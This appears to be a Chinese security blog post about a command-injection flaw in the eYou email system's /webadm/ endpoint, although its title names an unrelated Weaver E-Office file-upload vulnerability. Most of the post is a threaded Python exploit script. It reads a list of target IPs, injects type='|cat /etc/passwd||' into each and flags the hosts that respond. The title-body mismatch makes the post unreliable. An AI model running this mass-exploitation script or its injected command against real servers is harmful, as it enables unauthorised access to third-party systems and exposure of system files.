泛微OA E-Office 任意文件上传漏洞 (CNVD-2021-49104)
漏洞信息
亿邮电子邮件系统是由北京亿中邮信息技术有限公司(以下简称亿邮公司)开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意请求,使用POST方法在关键路径/webadm/的请求体参数type中执行命令,获取目标服务器权限,控制目标服务器。
截图
POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from queue import Queue
import threading
threads=[]
url_file=input("enter target file>>>")
f=open("yiyou_IP.txt","r")
def POC_1(target_url, result_q):
vuln_url = target_url + "/webadm/?q=moni_detail.do&action=gragh"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = "type='|cat /etc/passwd||'"
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)
print("\033[32m[o] 正在请求 {}//webadm/?q=moni_detail.do&action=gragh \033[0m".format(target_url))
if "root" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞 ,成功执行 cat /etc/passwd \033[0m".format(target_url))
print(target_url+"\033[32m[o] 响应为:\n{} \033[0m".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
for targets in f.readlines():
targets=targets.strip()
t=threading.Thread(target=POC_1,args=(targets,Queue()))
t.start()
threads.append(t)
for i in threads:
i.join()
f.close()
|
参考链接
